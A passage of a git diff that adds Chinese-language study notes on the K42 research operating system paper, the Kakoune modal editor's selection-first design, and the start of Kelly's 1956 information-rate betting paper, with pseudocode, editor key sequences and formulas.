年引入前的性能数据) +- Facebook:[Scalable memory allocation using jemalloc](https://engineering.fb.com/2011/01/03/core-infra/scalable-memory-allocation-using-jemalloc/) +- 现代手册:[jemalloc.net](http://jemalloc.net/) +- 对照阅读:[[jemalloc-2006]](本库另一篇偏工程应用的笔记)、[[slab-1994]]、[[immix-mark-region]] + +## 关联 + +- [[jemalloc-2006]] —— 同一主题,侧重 Firefox/Redis 实践与 MALLOC_CONF +- [[slab-1994]] —— 内核里「固定大小对象缓存」的鼻祖,思想与 run/region 同源 +- [[rcu-mckenney-2017]] —— 另一类多核读多写少问题的解法,可与 arena 分片对照 +- [[moesi-cache-coherence-1986]] —— false sharing 的硬件根因 diff --git a/src/content/docs/papers/k42-research-os-2006.md b/src/content/docs/papers/k42-research-os-2006.md new file mode 100644 index 000000000..131ed672a --- /dev/null +++ b/src/content/docs/papers/k42-research-os-2006.md @@ -0,0 +1,227 @@ +--- +title: K42 — 从零造一套能跑 Linux 程序的可扩展研究 OS +来源: https://dl.acm.org/doi/10.1145/1218063.1217949 +日期: 2026-06-13 +子分类: 内核与虚拟化 +分类: 操作系统 +provenance: pipeline-v3 +--- + +## 先想成什么事 + +想象一座**大型连锁超市**要同时服务两种顾客: + +- **普通顾客**(未改动的 Linux 应用)只认熟悉的收银台:POSIX API、glibc、bash、Apache、MySQL——他们不想学新规矩。 +- **超市运营方**(OS 研究者)却想在后台把货架、冷库、收银逻辑**按门店、按时段、按商品品类**拆开重组,而且换一套收银算法时**不用关店打烊**。 + +传统宏内核(经典 Linux)像**总部集权**:全国共用一套全局库存表、一把大锁、一种分页策略。门店从 2 家扩到 200 家时,收银台排队和仓库争用会指数级恶化。 + +**K42**(IBM Research,1996 年启动,EuroSys 2006 系统论文)走的是另一条路:**对象化 + 按请求就地生长 + 集群对象(Clustered Objects)**。内核不是「一个大结构体」,而是一棵按需实例化的对象树;多核上每个 CPU 尽量只碰**本 CPU 上的 Rep(Representative)**,避免全局锁。 + +日常类比再推一步: + +| 场景 | 传统 UNIX 内核 | K42 | +|------|----------------|-----| +| 打开两个文件 | 往往共享全局 page cache、inode 锁 | 每个打开实例有**独立一组对象**,策略可不同 | +| 多线程 Web 服务器缺页 | 多核抢同一个 `struct mm_struct` 相关锁 | Process 的 Clustered Object 按 CPU 复制/分区 | +| 打安全补丁 | 重启或冒险 `insmod` | **Hot swap**:换实现、迁状态、不断服务 | +| 跑现有软件 | 天然兼容 | **Linux API/ABI**,未改二进制也能跑 | + +论文 *K42: Building a Complete Operating System*(Krieger 等,EuroSys 2006,亦刊于 ACM SIGOPS Operating Systems Review Vol. 40 No. 4)不是教你怎么装发行版,而是**十年完整系统研究**的经验总结:动机、核心技术、研究方向,以及「研究 OS 怎样才算真的能用」。 + +## 这篇论文在说什么 + +| 维度 | 内容 | +|------|------| +| 作者 | Orran Krieger, Marc Auslander, Bryan Rosenburg, Robert W. Wisniewski, Jimi Xenidis, Dilma Da Silva, Michal Ostrowski, Jonathan Appavoo, Maria Butrico, Mark Mergen, Amos Waterland, Volkmar Uhlig(IBM T. J. Watson Research Center) | +| 场合 | EuroSys 2006,比利时鲁汶,4 月 18–21 日 | +| DOI | [10.1145/1218063.1217949](https://dl.acm.org/doi/10.1145/1218063.1217949) | +| 许可证 | LGPL 开源 | +| 目标平台 | PowerPC(G5、POWER3/4)、Mambo 全系统模拟器 | +| 兼容层 | **Linux API + ABI**,可运行未修改的 Linux 应用与 glibc | + +1996 年立项时的五条技术预判(论文 §1.1)今天读来很有意思: + +1. Windows 将统治客户端与大部分服务器——**猜错了**,但促使团队认真考虑「怎样让研究 OS 接得上主流生态」。 +2. 多处理器从高端到芯片多核都会爆发——**猜对了**,可扩展性是 K42 的基石。 +3. 维护宏内核成本会越来越高——**部分正确**,全局数据结构与策略纠缠仍是痛点。 +4. 可定制 OS(Exokernel、Spin、Vino 路线)会很重要——**猜对了**,K42 把定制做成基础设施而非个案 hack。 +5. 五年内全部 64 位——**大体正确**,K42 利用 64 位指针塞状态位、减少哈希结构。 + +## 为什么值得零基础读 + +1. **研究 OS 的「完整系统」范本**:不是只写一个新调度器贴进 Linux,而是从内存、文件、线程、跟踪、虚拟化到 Linux 兼容整栈打通——和 Singularity、Barrelfish、seL4 同期对话。 +2. **Clustered Objects 是多核局部性的教科书**:比「加把细粒度锁」更系统——接口统一,实现可在单 Rep、按簇、全分布之间切换。 +3. **Hot swap / dynamic upgrade 是运维思想的先驱**:补丁、自适应算法、按应用特化组件,用**同一套**替换机制,而不是每种场景写一种 `kprobe`。 +4. **Linux 兼容的务实工程**:直接链入 Linux 的 TCP/IP、驱动、部分文件系统代码,又用 trap reflection 保 glibc 不改——研究平台与生产生态之间的折中样本。 +5. **影响面超出论文页数**:贡献回流 Linux(模块卸载、quiescence)、Power 上的 Xen;曾用于 DOE FAST-OS、IBM PERCS;与 Tornado、Exokernel、Hive 等谱系一脉相承。 + +## 核心概念一:可扩展性四件套 + +论文 §3 把「怎样在多核 SMP/NUMA 上不失速」拆成四种互补技术: + +### 1. PPC(Protected Procedure Call) + +像**跨地址空间的函数调用**,但有一条硬规则:**客户端请求总在本地 CPU 上被服务**。客户端线程阻塞,但所属 **dispatcher**(见下)仍可运行其他用户态线程——类似 handoff 调度,避免内核里堆 thousands of kernel threads。 + +### 2. 局部性感知的动态内存分配 + +每个 CPU 有内存池;对象为某次请求创建时,**在受理该请求的 CPU 上分配**,减少 false sharing 和远程 NUMA 访问。 + +### 3. 对象分解(Object decomposition) + +服务 = 动态互联的对象实例集合,**懒构造**。例如:进程 P 把文件 F 的某段映射进地址空间,会生成**专属于 (P, F, mapping)** 的对象链;别的映射走别的对象,缺页处理不会踩全局 inode 锁。 + +### 4. Clustered Objects(集群对象) + +对外是一个对象接口;对内可有一个 **Root**(全局锚点)和多个 **Rep**(可在每 CPU 或每簇一个)。方法调用自动路由到**调用方本地 Rep**——这是 K42 区别于「普通 C++ 内核」的标志机制。 + +## 核心概念二:内存管理对象树 + +每个 K42 进程有一个地址空间,由 **Region** 划分连续虚拟区间;每个 Region 映射到某个「文件」(含匿名计算存储的特殊 file)。 + +| 对象 | 职责 | +|------|------| +| **Process** | 进程对象树根:Region 列表 + 硬件映射信息 | +| **Region** | 虚拟地址连续区间 → 文件内偏移连续区间 | +| **File Representative** | 内核侧文件化身,对接外部文件服务器做 I/O | +| **FCM(File Cache Manager)** | 该文件在内存中的页帧、本地换页策略 | +| **PM(Page Manager)** | 全局页帧分配给各 FCM | +| **HAT / SegmentHAT** | 硬件页表或 PowerPC VSID 等;段可私有或跨地址空间共享 | + +设计意图:**机制与策略可独立替换、组合**。同一 Region 可接「普通文件」或「处理器相关内存」(虚拟地址映射随 CPU 不同而指向不同物理页),只换对象实现,不动全局 VM 子系统。 + +额外约束(论文 §4)还包括:统一 buffer cache、页错误/upcall 不阻塞内核线程、可分页内核、外部文件服务器、fork/COW、NUMA 与大页支持。 + +## 核心概念三:动态定制(Hot swap) + +每个资源实例由**自己的**对象集合管理——两个应用同时打开「文件」类资源,可以挂**不同** FCM 策略。 + +- **Hot swapping**:用新组件替换旧组件,**接口不变**,内部状态迁移,外部引用重连,客户端无感。 +- **Dynamic upgrade**:对系统中某类服务的**所有**对象实例批量热换(例如升级 Process 对象实现时,每个进程一个实例,可懒换)。 + +适用场景论文写得很实在:安全补丁不停机、自适应算法模块化、常见路径特化实现、按需插桩、应用自带优化组件、第三方模块——**一套基础设施覆盖**,而不是每种需求发明一种内核补丁格式。 + +## 核心概念四:Dispatcher 与用户态调度 + +K42 把传统内核线程调度撕开: + +- **内核**调度 **dispatcher**(地址空间 + 调度实体,绑定 QoS/优先级类)。 +- **用户态线程库**在 dispatcher 上调度 **thread**。 +- 一个进程可多个 dispatcher:并行、不同优先级,或不同线程模型。 +- 缺页、PPC 阻塞的是 thread,dispatcher 通过 **upcall** 换跑别的 thread——**创建一万个线程不会比单线程多占内核 pinned 内存**。 + +IPC 主力是 **PPC**(同步,跨进程对象方法调用);另有异步 IPC 和同进程 dispatcher 间 **soft interrupt** 快速信令。参数过大放不进寄存器时,用每 CPU 一块的 **PPC page**(像扩展寄存器,上下文切换时按需保存)。 + +## 代码示例 1:Clustered Object 计数器(论文 §6 思路) + +下面用 C++ 风格伪代码说明:**外部看是一个 Counter,内部按 CPU 分片**,`getVal` 时才汇总——与「全局原子变量」对比,高并发 `inc` 几乎无共享写。 + +```cpp +// 用户可见接口 +class Counter { +public: + virtual void inc() = 0; + virtual void dec() = 0; + virtual long getVal() = 0; +}; + +// 每个 CPU 上的 Rep:常见路径只碰本地 val +class CounterRep : public Counter { + long val = 0; + CounterRoot* root; +public: + void inc() override { ++val; } + void dec() override { --val; } + long getVal() override { + // 读全局时才跨 CPU 聚合(Root 协调各 Rep) + return root->aggregate(); + } +}; + +// Root:决定 map 多少 CPU → 一个 Rep(共享 / 分片 / 每 CPU 一个) +class CounterRoot { + CounterRep* repForCpu(int cpu); + long aggregate(); // sum reps +}; +``` + +调用 `inc()` 时,运行库根据当前 CPU 把调用路由到本地 `CounterRep`——**客户端代码不知道有几个 Rep**。若工作负载以 `getVal` 为主,可换成共享 `val` 的实现,**换的是 Root/Rep 策略,不是 API**。 + +## 代码示例 2:Linux 系统调用的两条路径(trap reflection vs 直跳) + +论文 §10:既要**未修改 glibc**,又要 Exokernel 式**直跳内核旁路代码**。 + +```c +// 路径 A:未修改 glibc —— 仍执行 syscall 指令,内核把 trap「反射」回应用地址空间里的系统库 +void linux_compat_path(void) { + // glibc 汇编桩:syscall + // → K42 内核捕获 → 转给用户态 system library 实现 + write(fd, buf, len); +} + +// 路径 B:打过补丁的 glibc —— 直接 branch 到已映射的 K42 服务桩(论文称约快 44%) +void k42_fast_path(void) { + // 等价于:__k42_syscall_vector[SYS_write](fd, buf, len); + // 不经 trap,无内核入口/出口往返 + write(fd, buf, len); +} +``` + +应用还可通过宏在 **Linux 仿真模式**与**原生 K42 服务**之间切换,对热点路径(如自定义分页、专用文件语义)逐步重写,而不必一次抛弃整个 Linux 栈。 + +## 核心概念五:Linux 兼容与 KFS + +- **用户态**:标准 Debian 根文件系统、bash、gcc、Apache、MySQL、MPI 混合集群(论文记载)。 +- **内核态**:OO 内核 + **直接嵌入** Linux 网络栈、驱动、部分 FS 代码——用「类理想硬件」适配层隔离,维护成本不低。 +- **KFS**:体现 K42 哲学的文件系统(每文件独立缓存对象、可 hot swap 实现);也可跑在 Linux 上复用其 page cache。 + +线程是难点:**pthread 走 K42 自有线程方案**,与 Linux 线程模型切换时要小心边界(论文 §10 后续讨论)。 + +## 核心概念六:性能监控基础设施 + +论文 §9 强调:**跟踪设施应在最初设计时一体考虑**,而不是事后给 vfs、驱动、NPTL 各打补丁。 + +- 每 CPU 无锁环形缓冲,原子追加**变长事件**; +- 应用、库、服务器、内核写入**统一时间线**; +- 默认编译进系统,可动态开关,可图形化查看锁竞争。 + +团队用它在 K42 上分析 Linux 应用性能,修好后**回到原生 Linux 仍能受益**——研究平台也是性能实验室。 + +## 核心概念七:虚拟化(Application Managers) + +1996 年 K42 提出 **Application Managers**:大机器上按应用规模**时间复用**多个 OS 实例做故障隔离(与 Disco 空间复用 VM 不同)。多年后这与 **VMM / hypervisor** 潮流汇合;论文 §12 描述与 Xen on Power 等工作的关系——K42 自己后来也是虚拟化研究的载体。 + +## 与相关系统的对照 + +| 系统 | 与 K42 的关系 | +|------|----------------| +| **Mach / L4** | 微内核 + 用户态服务器;K42 更偏 OO 集群对象 + 库进应用地址空间,且完整 Linux 兼容 | +| **Exokernel** | 库在应用空间、应用可选策略;K42 吸收思想但保留更强内核对象模型 | +| **Tornado** | PPC 与 per-processor 局部性;K42 扩展 OO 到定制与 hot swap | +| **Singularity** | 同期「整栈重设计」;Singularity 放弃旧 ABI,K42 **保留** Linux ABI | +| **Linux 主线** | K42 的 quiescence、模块卸载等回流;研究原型 vs 产品路径 | + +## 1996 年预判十年后的复盘(论文 §13 精神) + +论文诚实回顾:Windows 统治力不如预期;**多核与可扩展性**比想象更关键;64 位普及;**可定制与动态升级**在云计算、热补丁时代更有价值。技术方向随之从 Application Managers 强调转向虚拟化与 PERCS/FAST-OS 等企业级探索——**活的研究平台会改路线图**,但 Clustered Objects + 局部性 + Linux 兼容这三根支柱一直在。 + +## 读懂这篇论文你能带走什么 + +1. **多核 OS 首先减 sharing**:对象分解 + per-CPU Rep 比「把大锁拆成小锁」更结构性。 +2. **接口稳定、实现可换**是研究 OS 能持续十年的原因——hot swap 不是炫技,是补丁与实验的通用句柄。 +3. **兼容现有生态**要付税(trap reflection、嵌入 Linux 驱动、pthread 缝隙),但换来真实工作负载与社区可复现。 +4. **观测与结构同设计**:没有统一 trace,很难证明 scalability 优化有效。 + +## 延伸阅读 + +- K42 主页(历史):`www.research.ibm.com/K42` +- IBM Systems Journal:*Experience with K42, an open-source, Linux-compatible, scalable operating-system kernel* +- EuroSys 2008:*K42: Lessons for the OS community*(Wisniewski 等,社区教训篇) +- 对比阅读:Exokernel (SOSP 1995)、Tornado (ASPLOS 1996)、Xen (SOSP 2003) + +## 小结 + +K42 回答的问题不是「下一个桌面 Linux 是什么」,而是:**如果 1996 年重新画一张多核、可定制、可维护的 OS 结构图,同时还要能直接跑 Apache,会长成什么样?** + +答案是——**一切皆对象,对象可集群,集群可热换;内核调度 dispatcher,线程与策略沉到用户态库;Linux 是兼容外壳,不是设计中心。** 十年工程 + 一篇 EuroSys 论文,把这条路线从幻灯片变成了可 boot 的内核,这是它留在操作系统教科书边上的原因。 diff --git a/src/content/docs/papers/kakoune-vim-philosophy.md b/src/content/docs/papers/kakoune-vim-philosophy.md new file mode 100644 index 000000000..fcdb4cc2b --- /dev/null +++ b/src/content/docs/papers/kakoune-vim-philosophy.md @@ -0,0 +1,243 @@ +--- +title: Kakoune — 面向对象的模态编辑器:先圈地,再动刀 +来源: https://kakoune.org/why-kakoune/why-kakoune.html +日期: 2026-06-13 +子分类: 编辑器与 IDE +分类: CLI +provenance: pipeline-v3 +--- + +## 是什么 + +**Kakoune**(作者 Maxime Coste / mawww)是一类特殊的**模态代码编辑器**:它继承 Vi 的「按键即编辑语言」传统,却把核心抽象从「光标」升级成**选区(selection)**,并把语法从 Vim 的 **动词-名词(verb-object)** 翻转为 **名词-动词(object-verb)**。官网文章 [*Why Kakoune — The quest for a better code editor*](https://kakoune.org/why-kakoune/why-kakoune.html) 系统阐述了这套哲学;配套 [design.asciidoc](https://github.com/mawww/kakoune/blob/master/doc/design.asciidoc) 则把它落实为七条工程原则。 + +日常类比一:**改合同**。Vim 像律师先喊「删除!」再指条款——`dw` 是 delete + word,指错了一整段就没了,只能 `u` 撤销重来。Kakoune 像用荧光笔**先圈出要改的段落**,确认高亮范围对了,再按 `d` 删除;圈错了一个词,用 `BH` 把多圈的部分从选区里减掉,不必推倒重来。 + +日常类比二:**批处理 Excel**。你想把表里所有 `foo` 改成 `bar`:传统编辑器有专门的「全局替换」对话框;Kakoune 没有这条捷径,而是 `%` 选中全文 → `sfoo` 在每个匹配处生成一个选区 → `cbar` 同时替换——像先给每个单元格打上标记,再一次性填值。**多选区不是附加功能,而是交互的中心原语**。 + +Helix、部分 Neovim 插件思路都直接或间接继承了 Kakoune 的「选区优先 + 多光标」模型,因此读这篇 2020 年的宣言,有助于理解下一代终端编辑器为何长得不像经典 Vim。 + +## 为什么值得学 + +程序员职业生涯以十年计,花几周掌握编辑/nav 工具的投资回报率很高——原文第一个论点。更具体地说,不理解 Kakoune 哲学会导致: + +- 把 Helix 的 `wd` 误当成 Vim 键位打错——顺序颠倒背后是**先预览、后执行**的安全模型 +- 在 Kakoune 里找 `:s/foo/bar/g` 全局替换——设计上故意用选区组合替代专用命令 +- 低估「移动 = 选中」统一语义带来的可组合性——`w` 不是跳光标,是扩展选区到下一词 + +## Vim 与 Kakoune:两套编辑语法 + +### 模态编辑作为语言 + +Vi 家族把编辑建成**可组合语言**:`d`(delete)+ `w`(word)= 删一个词;`y` + `i` + `b` = 复制括号内文本。动词少、名词(文本对象)丰富,组合表达结构级意图,而不是重复点鼠标。 + +| 维度 | Vim / Vi | Kakoune | +|------|----------|---------| +| 基本语序 | 动词 → 对象(`dw`) | 对象 → 动词(`wd`) | +| 移动语义 | 移动光标与选中分离 | **移动即选中** | +| 反馈时机 | 整句命令结束后才看到结果 | **每一步**高亮当前选区 | +| 多光标 | 插件或后期补丁 | **一等公民**,无单独「全局替换」 | +| 改 buffer | normal / insert / ex / 脚本多条路径 | **仅 normal + insert** 改文本 | + +### 交互性:在暗处编辑 vs 开着灯编辑 + +Vim 的 `5dw`:按完才知道删了五个词还是六个。Kakoune 的 `5W`:立刻看到五个词被高亮;若多选一个,`` 或 `BH` 收缩选区,再 `d`。原文称之为修复 Vi **lack of interactivity** 的核心手段——配合 **object-then-verb**,让「看清再改」成为默认路径。 + +### 可预测性:正交积木 + +设计文档强调 **orthogonality(正交)** 与 **simplicity**: + +- `d` **只做一件事**:删除当前选中的内容,没有隐藏的 `x` 变体 +- `%` **只做一件事**:选中整个 buffer +- `s` **只做一件事**:对当前选区内的正则匹配再建子选区 + +复杂操作 = 简单命令链,而非新增专用子命令。因此 `d` 在 Kakoune 里**就是**「删除选中文本」这条命令本身,不是绑定到某个抽象 editing API 的快捷键——normal mode **就是**编辑语言,不是另一层 DSL 的皮。 + +## 核心概念 + +### 1. Selection(选区):真正的「编辑对象」 + +选区是有向、** inclusive ** 的字符区间,两端为 **anchor(锚点)** 与 **cursor(光标端)**。扩展选区时锚点固定、光标移动;普通移动则两端一起动。缓冲区里**始终至少有一个选区**,且至少覆盖一个字符(锚点与光标可重合为单点)。 + +这就是「面向对象」的含义:你操作的不是抽象「文件」,而是**当前选中的文本对象集合**;动词(`d`/`y`/`c`/`|`)永远作用于选区。 + +### 2. 移动 = 选中 + +- `w`:从当前位置选中到下一词首(不是 invisible 跳过去) +- `W`(大写):**扩展**选区至下一词,保留已选部分 +- `(`:选中配对括号内内容(text object) + +大写命令普遍表示「在现有选区上扩展」,小写则常替换/重定义选区——习惯记住后,预览路径与最终操作一致。 + +### 3. Multiple Selections(多选区) + +获得多选区的典型路径: + +1. `s`:在当前每个选区内,为每个匹配创建子选区 +2. `S`:按正则**拆分**选区 +3. `Alt+s`:对当前选区按行拆分 +4. `|` / `$`:管道或 shell 过滤后保留/丢弃选区 + +之后 `c`、`d`、`i`、`|sort` 等**同时**作用于所有选区。没有 `:substitute` 全局替换——`%sfoo cbar` 是 `%` + `sfoo` + `cbar` 的组合,而非专用 Ex 命令。 + +### 4. 模式分工(正交) + +| 模式 | 职责 | +|------|------| +| Normal | 操纵选区与选区内容(编辑语言本体) | +| Insert | 向 buffer 插入字符 | +| Prompt (`:`) | 打开文件、设选项、执行非编辑命令 | + +修改 buffer 文本不走命令模式脚本——与 Vim 的 `:s`、`normal @q` 等多通道形成对比。扩展靠 `%sh{...}`、Unix 管道和 socket,而非内嵌脚本 VM。 + +### 5. Unix 公民与 Client-Server + +- `|`:把选区内容 pipe 给 shell 命令,输出写回选区 +- `$`:对选区跑 shell,保留退出码为 0 的选区 +- `kak -p`:从外部向 session 喂命令 +- 多 client 连同一 server:窗口管理交给 tmux / 窗口管理器,编辑器只管文本 + +设计文档明确:**不做线程、不做二进制插件、不做内嵌脚本语言**——异步任务用 fifo buffer + 后台 shell(如 `make`、`grep`)完成。 + +## 代码示例 + +### 示例 1:全局把 `foo` 换成 `bar`(无 `:substitute`) + +假设 buffer 为: + +```text +foo = 1 +bar = foo + 1 +# foo comment +``` + +在 Kakoune normal mode 中的键序(空格仅为可读性,实际无空格): + +```text +%sfoo cbar +``` + +分步理解: + +| 键 | 效果 | +|----|------| +| `%` | 选中整个 buffer(一个选区覆盖全文) | +| `sfoo` | 在全文选区内,每个 `foo` 子串各成一个选区(此处 3 个) | +| `cbar` | 对所有选区执行 change,统一替换为 `bar` | +| `` | 回到 normal mode | + +等价于「先标记所有目标,再一次改写」——与对话框式全局替换不同,**中间任意步都能看见高亮**,可在 `d` 之前用 `,`(缩小选区)或 `&`(对齐)等原语微调。 + +若只想替换字符串字面量中的 `foo`,可先 `s"` 选中引号内,再 `sfoo`,避免误伤注释——组合粒度由你控制,不靠正则开关标志位。 + +### 示例 2:`snake_case` ↔ `camelCase`(多选区 + 子选区) + +原文示例:选中标识符 `my_long_name`,再: + +```text +w s_ d ~ +``` + +| 键 | 效果 | +|----|------| +| `w` | 选中当前词 `my_long_name` | +| `s_` | 在词内每个 `_` 处建子选区 | +| `d` | 删除所有 `_` 选区 | +| `~` | 对剩余选区(下划线后首字母)切换大小写 → `myLongName` | + +反向(camelCase → snake_case)原文键序: + +```text +w s[A-Z] ` i_ +``` + +- `s[A-Z]`:子选区匹配大写字母 +- `` ` ``:转小写 +- `i_`:在选区前插入下划线 + +整段可录宏复用到任意标识符——**结构相同、文本不同**的重复编辑,正是编辑语言要解决的场景。 + +### 示例 3:交换函数参数 `func(arg2, arg1)` + +```text +( S, +``` + +| 键 | 效果 | +|----|------| +| `(` | 选中括号内 `arg2, arg1` | +| `S,` | 按逗号拆成两个选区 | +| ``(rotate) | 交换各选区内容顺序 | + +无需结构化 AST——纯文本原语完成重排。与 AST 工具(如 ast-grep)可互补:简单重排用选区,语义级改写用外部管道。 + +### 示例 4:与外部命令组合(Unix 管道) + +选中若干行后排序去重: + +```text +|sort -u +``` + +Kakoune 把选区文本作为 **stdin** 传给 `sort -u`,stdout 写回选区。设计哲学:**编辑器不做排序**,把排序交给四十年历史的 Unix 工具;正交性要求功能不重叠。 + +## 可发现性与学习曲线 + +键盘驱动工具常因「没有菜单」而难上手。Kakoune 用两套机制补偿: + +1. **Prompt 补全**:输入 `:` 即列出命令;参数位自动提示 buffer 名、文件名、固定枚举 +2. **Auto-information**:按 `g` 等待第二键时,信息框列出所有 `goto` 子命令;可配置为每次 normal 按键后显示刚执行命令的说明 + +另全面采用 **fuzzy completion**(子序列匹配,非仅前缀),insert 与 prompt 均可用——降低背键表成本,但**学习曲线仍陡**,原文亦坦诚需数周投入。 + +## 与 Vim 的效率对比 + +[mawww/golf](https://github.com/mawww/golf) 收录 Kakoune 与 Vim 在 [vimgolf](http://www.vimgolf.com/) 题目上的击键对比:多数题目 Kakoune 用更**地道(idiomatic)** 的选区组合胜出,而非靠冷门快捷键。例如换行拆分常用 `` ` `` 等价于 `S^`,因太常见而独占一键。 + +设计目标原文表述为:**interactive, predictable, and fast at the same time**——三者通常被认为不可兼得,Kakoune 押注多选区 + 反转语法可以同时满足。 + +## 设计文档中的工程约束 + +摘自 `doc/design.asciidoc`,与哲学一致: + +- **Limited scope**:不做窗口管理、不做「聪明」到替用户决策的魔法;提供 dumb 版本让用户组合 +- **No threading**:交互路径必须「对用户即时」;异步交给外部进程 + fifo +- **No binary plugins / no embedded scripting**:避免第二套 API 面;`%sh{}` + 环境变量足够表达 completer、linter、formatter +- **Normal mode is the language**:脚本与交互共用同一套 normal 键序,保证交互语言足够表达缩进 hook 等复杂场景 + +## 影响与定位 + +- **2013+**:Kakoune 公开;设计文档成为编辑器设计讨论常引文献 +- **Helix**:公开声明借鉴 noun-verb 顺序、多选区、选区优先交互 +- **Neovim 生态**:部分插件模拟 Kakoune 选区模型,但非内核一等公民 + +Kakoune 用户量远小于 Vim/Neovim,但**概念影响力**大于市场份额——类似 Smalltalk 对 OOP 语言的影响路径。 + +## 何时适合 / 不适合 + +**适合**: + +- 愿意把编辑当成可组合语言,享受「结构级一次操作」 +- 重度终端 + tmux 工作流,需要 client-server 多窗口同 session +- 偏好 Unix 管道组合,而非 IDE 内置所有功能 + +**不适合**: + +- 需要开箱即用 GUI、文件树、调试器一体化 +- 依赖 Vimscript 插件生态且不愿重写为外部工具 +- 期望 `:substitute`、Vim 宏语法零成本迁移 + +## 与相关笔记 + +- [[kakoune]] —— 项目向笔记:安装、client-server、`kak-lsp` 配置 +- [[helix]] —— Rust 实现,内置 Tree-sitter + LSP,继承本哲学 +- [[vim]] —— 经典 verb-object 模态编辑对照 +- [[language-server-protocol-spec]] —— Kakoune 通过 `kak-lsp` 外接 LSP,本身不内置 +- [[monaco-editor]] —— GUI 嵌入式路线,设计假设截然不同 + +## 参考资料 + +- 宣言原文:[Why Kakoune](https://kakoune.org/why-kakoune/why-kakoune.html)(Maxime Coste, 2020) +- 设计原则:[doc/design.asciidoc](https://github.com/mawww/kakoune/blob/master/doc/design.asciidoc) +- 击键对比:[mawww/golf](https://github.com/mawww/golf) +- 官方站:[kakoune.org](https://kakoune.org) diff --git a/src/content/docs/papers/kelly-criterion-1956.md b/src/content/docs/papers/kelly-criterion-1956.md new file mode 100644 index 000000000..cbac12994 --- /dev/null +++ b/src/content/docs/papers/kelly-criterion-1956.md @@ -0,0 +1,226 @@ +--- +title: Kelly Criterion — 信息率的新解释 +来源: https://www.princeton.edu/~wbialek/rome/refs/kelly_56.pdf +日期: 2026-06-13 +子分类: 量化金融 +分类: 其他 +provenance: pipeline-v3 +--- + +## 是什么 + +Kelly 1956(*A New Interpretation of Information Rate*)是 Bell Labs 物理学家 **John L. Kelly Jr.** 发表的一篇 10 页论文。它把 Shannon 1948 里的**信道传输率 R**(互信息)和**赌博/投资中的资金指数增长率 G** 画上了等号: + +> 若信道输入符号对应可下注的随机事件,且赔率与真实概率一致(公平赔率),赌徒利用接收符号下注,可使资金**指数增长**;使 G 最大的下注策略,其增长率恰好等于信道的 **R**。 + +日常类比:你有一条**内线电话**(噪声信道),能比赌场大厅早 0.5 秒知道赛马结果。问题不是「这一把赢多少」,而是「**无限重复**时,本金按什么速度复利」。Kelly 给出的答案:**每次只押本金的一定比例**——押太多会在某次连输后归零(破产概率 → 1),押太少又浪费信息优势。最优比例让长期增长率 G 最大,而这个 G 在数学上就是 Shannon 的 **bit/秒**。 + +论文最初发在 *Bell System Technical Journal* 35(4):917–926(1956 年 7 月),同年亦见于 *IRE Transactions on Information Theory*。后来投资界把公式叫 **Kelly criterion(凯利公式)**;Shannon 本人和 MIT 数学家 Ed Thorp 曾用它在拉斯维加斯试手(见 Poundstone《Fortune's Formula》)。 + +## 为什么重要 + +不理解 Kelly 1956,下面这些事都讲不清: + +- 为什么「**期望收益最大**」和「**长期不破产**」常常是两套答案——全仓押注 E[资金] 可能很高,但几乎必然破产 +- 为什么量化基金、期权交易、体育博彩里都在谈 **fractional Kelly(半凯利)** +- Shannon 的 **R = I(X;Y)** 除了编码定理,还有**不编码**时的经济意义:信息 = 可变现的复利增速 +- 为什么 [[shannon-1948]] 之后信息论能走进金融:Kelly 是第一个严格的「信息 → 财富」桥梁 +- 现代 portfolio 理论里 **对数效用最大化** 与 Kelly 下注在独立赌局下等价 + +Kelly 本人 1965 年 41 岁早逝;公式由 Thorp、Berlekamp、Simons 一脉传到文艺复兴科技等对冲基金。Buffett 是否用「变体 Kelly」有争议,但**对数复利思维**与本文一脉相承。 + +## 核心要点 + +### 1. 指数增长率 G + +赌徒初始本金 V₀,第 N 次后本金 V_N。Kelly 定义(对数底为 2,与信息论一致): + +``` +G = lim_{N→∞} (1/N) log₂(V_N / V₀) +``` + +- G > 0:资金以 2^G 倍/局的复利速度增长(渐近意义) +- G = 1:每局本金翻倍(无噪声、全知、公平赔率的理想情况) +- G < 0:长期趋向破产 + +**关键**:优化目标是 **G**,不是单局的 E[V] 或「赢的概率」。 + +### 2. 噪声二元信道 + 公平赔率(论文核心例子) + +信道传输「赢/输」,正确概率 q,错误概率 p(p + q = 1)。赌场给**公平赔率**(赢一倍本金)。每次押本金比例 ℓ(0 ≤ ℓ < 1),W/L 为赢/输次数,则: + +``` +V_N = (1+ℓ)^W (1-ℓ)^L V₀ +G = q·log₂(1+ℓ) + p·log₂(1-ℓ) (几乎必然成立) +``` + +对 ℓ 求极大,利用 log 凹性得: + +``` +(1+ℓ) / (1-ℓ) = q / p +ℓ* = q - p = 2q - 1 (当 q > 1/2 时才有正下注) +G_max = 1 + p·log₂ p + q·log₂ q = R +``` + +**R 正是 Shannon 信道容量(二元对称信道)**。信息优势 q > 0.5 时,最优策略不是全仓,而是只押 **(2q-1)** 的本金比例。 + +若 q = p = 0.5(信道无用),则 ℓ* = 0——**公平赔率下没有优势就不下注**,哪怕期望看起来「不亏」。 + +### 3. 一般情形:多符号 + 任意赔率 + +符号 s 真实概率 p(s),收到 r 后下注比例 a(s|r),赔率 α_s(押 1 元正确时拿回 α_s 元,含本金)。资本增长率: + +``` +G = Σ_{s,r} p(s,r) · log₂( Σ_s' a(s'|r)·(α_{s'} - δ_{s,s'}) + (1 - Σ_{s'} a(s'|r)) ) +``` + +(δ 为 Kronecker 符号;未押出的部分保留为现金。)在**公平赔率** α_s = 1/p(s) 且独立重复下,使 G 最大的策略满足:**收到 r 后,按后验 q(s|r) 的比例分配赌注**。此时最大 G 等于互信息 I(S;R)。 + +若赔率由另一套概率 q̃(s) 定价(市场隐含概率),则 G 的增量仍与 **I(S;R)** 相关;存在 **track take**(抽水)时公式更复杂。 + +### 4. 与经典「凯利公式」的对应 + +单次赌局:赢概率 p,净赔率 b(赢则净赚 b,输则亏光所押),最优押注比例: + +``` +f* = (p·(b+1) - 1) / b = (p·b - q) / b (q = 1-p) +``` + +这是二元 Kelly 在**非公平赔率**下的常见写法,可由论文一般式退化得到。投资里常写 **f* = μ/σ²**(正态近似),那是连续情形的推广,不是 Kelly 原文重点。 + +### 5. Kelly 对 Shannon 的「新解释」 + +Shannon 定理:存在编码使误码率任意小,传输率可达 R。Kelly 补充:**即使不做编码**,只要接收方能**反复下注、复利再投资**,R 仍度量「能从信道榨出的最大指数财富增速」。这给雷达、侦听等「无法编码」场景提供了不同于任意 cost function 的、与概率结构绑定的价值度量。 + +## 实践案例 + +### 案例 1:内线 60% 准确,公平赔率 + 